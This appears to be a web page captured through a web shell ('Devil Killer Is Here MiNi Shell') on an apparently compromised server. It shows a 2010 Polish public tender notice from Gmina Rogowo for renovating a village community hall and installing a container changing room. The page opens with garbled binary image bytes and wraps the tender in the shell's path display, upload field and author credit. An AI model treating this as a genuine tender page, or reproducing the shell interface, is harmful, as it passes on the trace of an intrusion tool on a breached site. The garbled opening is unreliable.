JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100811/246250-N-2010.html

<p class="kh_header"><b>Rogowo: Remont  i wyposażenie budynku świetlicy wiejskiej oraz postawienie wraz z montażem i dostawą szatni kontenerowej w miejscowości Grochowiska Księże.</b><br>
<b>Numer ogłoszenia: 246250 - 2010; data zamieszczenia: 11.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rogowo , ul. Kościelna 8, 88-420 Rogowo, woj. kujawsko-pomorskie, tel. 52 3024053, faks 52 3024275.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> htt://rogowo.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont  i wyposażenie budynku świetlicy wiejskiej oraz postawienie wraz z montażem i dostawą szatni kontenerowej w miejscowości Grochowiska Księże..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Postanowienia ogólne
Przedmiotem zamówienia jest remont i wyposażenie budynku świetlicy wiejskiej oraz postawienie wraz z montażem i dostawą szatni kontenerowej w miejscowości Grochowiska Księże.
Charakterystyka budynku:
Budynek świetlicy wiejskiej z remizą OSP położony jest w Grochowiskach Księżych na działce nr 109 łamane przez 1. Ww.  budynek jest obiektem wolnostojącym wykonanym w technologii tradycyjnej. Ściany zewnętrzne murowane (bez warstwy docieplenia) i otynkowane tynkiem cementowo-wapiennym o strukturze nakrapianej. Dach jednospadowy o konstrukcji monolitycznej pokryty papą. Dostęp do poszczególnych części budynku od zewnątrz za pośrednictwem drzwi jednoskrzydłowych i wrót stalowych.  Stolarka okienna okna skrzynkowe. Budynek wyposażony jest w następujące instalacje:
-tymczasowe ogrzewanie elektryczne,
-wodno-kanalizacyjną, 
-wentylację grawitacyjną,
-elektryczna i odgromową.
Zestawienie powierzchni i kubatury budynku:
-powierzchnia użytkowa  -  121,70 m2,
-powierzchnia zabudowy -  169,68 m2,
-kubatura                             - 443,35 m3.
W budynku znajdują się następujące pomieszczenia:
1)	Świetlica z zapleczem o wym. 15,60 m(dł.)x7,80 m (szer.)x2,80 m(wys.).
2)	OSP boksy garażowe z zapleczem 7,80 m(dł.)x 4,10 m (szer.)x2,85 m(wys.) . 
Na przedmiot zamówienia składa się wykonanie: 
I.	Remontu i wyposażenia budynku świetlicy wiejskiej wraz z częścią przeznaczoną dla OSP:
1) Zakres robót dotyczący świetlicy:
     a) rozebranie obróbek murów ogniowych,
     b) rozebranie rynien i rur spustowych,
     c) rozbiórka pokrycia z papy na dachu betonowym, 
     d) uzupełnienie tynków zewnętrznych murków ogniowych,
     e) wykonanie obróbek blacharskich z blachy ocynkowanej,
            f) montaż rynien dachowych o śr. 15 cm oraz rur spustowych o śr. 10 cm z blachy stalowej ocynkowanej 
g) położenie papy termozgrzewalnej dwie warstwy (papa podkładowa izolacyjna gr. 4,7 mm, papa nawierzchniowa gr. 5,2 mm),
            h) wymiana instalacji odgromowej wraz z wykonaniem pomiarów instalacji,
            i) wymiana stolarki okiennej na okna rozwierane i uchylno-rozwierane dwudzielne z PCV w kolorze białym  o współczynniku przenikania ciepła  max. 1.1 W(m*K wraz z wykuciem podokienników drewnianych, obsadzeniem podokienników wew. z PCV dł. 1,56 m,  szer. 25 cm oraz obsadzeniem  podokienników z blachy powlekanej w kolorze białym  parapety zewnętrzne,
             j) wykonać obróbki ościeży wewnętrznych i zewnętrznych,
             k) skucie luźnego i wykonanie nowego tynku cementowo-wapiennego o strukturze zbliżonej do tynku  istniejącego,
             l) oczyszczenie metodą ciśnieniową (zmycie) elewacji budynku,
            m)zagruntowanie i dwukrotne malowanie farbą elewacyjną silikonową,
             n) oczyszczenie i pomalowanie dwukrotne farba olejną drzwi wejściowych do świetlicy,
            o) dostawa sprzętu gospodarstwa domowego oraz sprzętu RTV tj.
                 -lodówki o pojemności chłodziarki  min. 230 litrów i zamrażarki dolnej min. 50 litrów, wysokości od 180 cm do 185 cm, szerokości 60-65 klasa energetyczna A+, 
                -dostawa i montaż (przez osobę uprawnioną) kuchenki gazowo-elektrycznej o pojemności piekarnika min. 55 litrów, 4 palniki, klasa energetyczna A+,
               -urządzenia Hi Fi z funkcją wielkoformatowego odtwarzania, 2 drożne głośniki, co najmniej 1 złącze USB, moc wejściowa (RMS) 2x60W, moc subwoofera (RMS) 100 W.
        2) Zakres robót budowlanych dotyczący części remizy OSP ( garaż i zaplecze):
     a) rozebranie obróbek murów ogniowych,
     b) rozebranie rynien i rur spustowych,
     c) rozbiórka pokrycia z papy na dachu betonowym, 
     d) uzupełnienie tynków zewnętrznych murków ogniowych,
     e) wykonanie obróbek blacharskich z blachy ocynkowanej,
            f) montaż rynien dachowych o śr. 15 cm oraz rur spustowych o śr. 10 cm z blachy stalowej ocynkowanej 
g) położenie papy termozgrzewalnej dwie warstwy (papa podkładowa izolacyjna grubości 4,7 mm, papa nawierzchniowa gr. 5,2 mm),
            h) wymiana instalacji odgromowej wraz z wykonaniem pomiarów instalacji,
             i) wymiana stolarki okiennej na okna jednodzielne, rozwieranie  z okuciami umożliwiającymi uchylanie okna z PCV w kolorze biały o współczynniku przenikania ciepła max. 1.1 W(m*K wraz z zamontowaniem parapetu zewnętrznego z blachy powlekanej w kolorze białym
             j) oczyszczenie metodą ciśnieniową (zmycie) elewacji budynku,
             k)zagruntowanie i dwukrotne malowanie farbą elewacyjną silikonową tynku zewnętrznego.
    II. Zakup, dostawa i montaż szatni kontenerowej dla obsługi boiska sportowego. Projektowaną szatnię kontenerową należy usytuować na działce nr 109/1 równolegle do istniejącego budynku świetlicy w odległości 10 m. Kontener jest typowym, gotowym budynkiem, w którym powinny znajdować się pomieszczenia tj.:
        - dwie szatnie dla zawodników, w których winny znaleźć się ławki i wieszaki naścienne, grzejnik elektryczny (znajduje się na wyposażeniu kontenera)
             - pokój sędziego lub trenera, grzejnik elektryczny (znajduje się na wyposażeniu   kontenera) w pomieszczeniu z umywalką znajduje się 5 litrowy podgrzewacz do wody (pod umywalką), który jest na wyposażeniu,
             - sanitariat (pomieszczenie z umywalką i grzejnikiem elektrycznym oraz odrębne pomieszczenie z sedesem) wymienione elementy tj. umywalka, sedes oraz grzejnik są na wyposażeniu kontenera.   
            Pomieszczenie sanitariatu winno być wentylowane w ścianie zamontować wentylację mechaniczną.
              Dane techniczne kontenera:
              - powierzchnia użytkowa      - 19,60 m2,
              - powierzchnia zabudowy     - 22,25 m2,
              - kubatura                        - 62,30 m3
              - długość min.  9,12 m,
              - szerokość min. 2,435 m,
              - wysokość min. 2,80 m.
             Kontener należy ustawić na dziesięciu fundamentach podporowych o wym. 40x40 cm wykonanych z betonu B 20 gł. min. 90 cm. Budynek winien być przymocowany do punktów podporowych za pomocą odciągów lub połączeń śrubowych. Znajdującą się  w kontenerze instalacje   należy podłączyć:
1)	instalację elektryczną do istniejącego przyłącza na budynku świetlicy zgodnie z wydanymi warunkami energetycznymi stanowiącymi załącznik do projektu budowlanego pn.Szatnia kontenerowa dla obsługi boiska sportowego,
2)	instalację wodociągową do istniejącego przyłącza wodociągowego (plan zagospodarowania działki) należy przyłączyć za pomocą węża PE O 90 mm, który należy poprowadzić na głębokości 150 cm poniżej terenu. W pomieszczeniu wc należy zamontować zestaw wodomierzowy z zaworem antyskażeniowym. Na doprowadzeniu instalacji wodociągowej należy zamontować zawór do spuszczania wody z instalacji.
UWAGA: Przed zasypaniem wykopu należy zgłosić dokonanie odbioru technicznego przyłącza wodociągowego.  
3)	instalację kanalizacyjną do istniejącego szamba (plan zagospodarowania działki) za pomocą rur PCV O 160 mm posadowionych min. 100 cm poniżej poziomu terenu ze spadkiem 1 procent w kierunku zbiornika bezodpływowego uzgodnionego Przedmiot zamówienia tj. kontener zależy zakupić i dostarczyć zgodnie            z projektem budowlanym pn. Szatnia kontenerowa dla obsługi boiska sportowego oraz zapisami zawartymi w niniejszej SIWZ Zamawiającemu do miejscowości Grochowiska Księże.  Zamawiający na budowę szatni kontenerowej dla obsługi boiska sportowego uzyskał pozwolenie na budowę Starosty Żnińskiego.  
Szczegółowy opis przedmiotu zamówienia zawierają:
1)	dokumentacja projektowa składająca się z projektu budowlanego Szatnia kontenerowa dla obsługi poiska sportowego;
2)	kosztorys ofertowy;
3)	przedmiar robót;
4)	specyfikacja techniczna wykonania i odbioru robót budowlanych,
które stanowią załącznik do niniejszej SIWZ i zamieszczone są na stronie internetowej Zamawiającego http://rogowo.bip.net.pl .
Do każdej nazwy firmy, przykładowych znaków towarowych, typów urządzeń, które zostały wymienione projekcie budowlanym (wykonawczym), specyfikacji technicznej wykonania i odbioru robót, przedmiarze robót dodaje się lub równoważne. Za równoważne rozumie się materiały lub urządzenia o parametrach nie gorszych niż  wyszczególnione w SIWZ.
Zamawiający wymaga, że:
1)	Wykonawca udzieli 24 miesięcznej gwarancji na wykonanie roboty budowlanej liczonej od dnia odbioru przedmiotu wykonanego zamówienia przez Zamawiającego.  
2)	Wykonawca uzyska pozwolenie na użytkowanie szatni kontenerowej dla obsługi boiska sportowego w Grochowiskach Księżych.
3)	Wykonawca wykona prace towarzyszące tj. geodezyjne wytyczenie  i inwentaryzację powykonawczą w 3 egz. dla szatni kontenerowej wraz z urządzeniami naziemnymi i podziemnymi - do kosztorysu ofertowego należy wliczyć koszt usługi geodezyjnej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.19.10-6, 45.31.23.10-1, 45.42.10.00-4, 45.44.30.00-4, 45.21.22.30-7, 39.71.00.00-2, 32.00.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawaiający nie wymaga wplaty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja tego warunku nastąpi poprzez odesłanie do odrębnych przepisów, które wskazują na obowiązek posiadania uprawnień do wykonywania określonej działalności lub czynności. Wykazaniu spełnienia tego warunku może posłużyć odpowiedni dokument koncesji, zezwolenia lub licencji Wykonawcy (ubiegającego się o zamówienie publiczne-przyszła strona umowy).
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/nie spełnia na podstawie załączonego  do oferty oświadczenia Wykonawcy (załącznik nr 3 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do weryfikacji spełnienia tego warunku posłużą odpowiednio wykazy wykonanych robót budowlanych. Warunek ten będzie spełniony, jeżeli Wykonawcy udokumentują, że wykonali  tj. zakończyli roboty budowlane w okresie pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonywania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wykonawcy powinni udokumentować co najmniej dwie roboty budowlane w zakresie budowy, przebudowy lub remontu budynku mieszkalnego, obiektów użyteczności publicznej lub podobnych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3.1.	Dysponują potencjałem  technicznym 
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że Weryfikacji spełnienia tego warunku dokonywana będzie w oparciu o potencjał techniczny zdolny do realizacji niniejszego zamówienia (wyposażenie zakładu, urządzenia techniczne).  
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/ nie spełnia na podstawie załączonego  do oferty oświadczenia Wykonawcy (załącznik nr 3 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3.2.	Dysponują  osobami zdolnymi do wykonania zamówienia
        Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi będącymi przedmiotem zamówienia o specjalności
             konstrukcyjno - budowlanej min. w ograniczonym zakresie,
Wykazane osoby powinny przynależeć do właściwej izby inżynierów budownictwa, jeżeli obowiązek przynależności do izby inżynierów budownictwa wynika z odrębnych przepisów.
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/ nie spełnia na podstawie załączonego  do oferty oświadczenia Wykonawcy (załącznik nr 3 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie niniejszego zamówienia musi znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia.
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/ nie spełnia na podstawie załączonego  do oferty oświadczenia Wykonawcy (załącznik nr 3 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) wypełniony i podpisany przez Wykonawcę formularz oferty wraz z kosztorysem ofertowym załącznik nr 2 do SIWZ,
      b) projekt umowy stanowiący załącznik nr  9 do SIWZ,
      c) harmonogram rzeczowo-finansowy- załącznik nr 1 do projektu umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było wcześniej przewidzieć w chwili zawarcia umowy, Zamawiający odstąpi od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. 
2. Zamawiający przewiduje możliwość zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, a dotyczących:
1)	zmiany kierownika robót bądź osób wskazanych do kontaktu w sprawach realizacji umowy w przypadku zdarzeń uniemożliwiających wykonywanie przez nich wskazanych funkcji; 
2)	zmiany terminu zakończenia realizacji inwestycji:
a)	z powodu okoliczności siły wyższej tj. klęski żywiołowej, warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych,
b)	w przypadku prowadzenia badań w wykopaliskach archeologicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://rogowo.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rogowo, ul. Kościelna 8, 88-420 Rogowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2010 godzina 11:00, miejsce: Urząd Gminy Rogowo ul. Kościelna 8, 88-420 Rogowo pok. 3-sekretariat (parter) do dnia 26 sierpnia 2010r. do godz. 11.00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja współfinansowana w ramach działania 413 Wdrażanie lokalnych strategii rozwoju w zakresie operacji odpowiadających warunkom przyznania w ramach Działania Odnowa i rozwój wsi objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com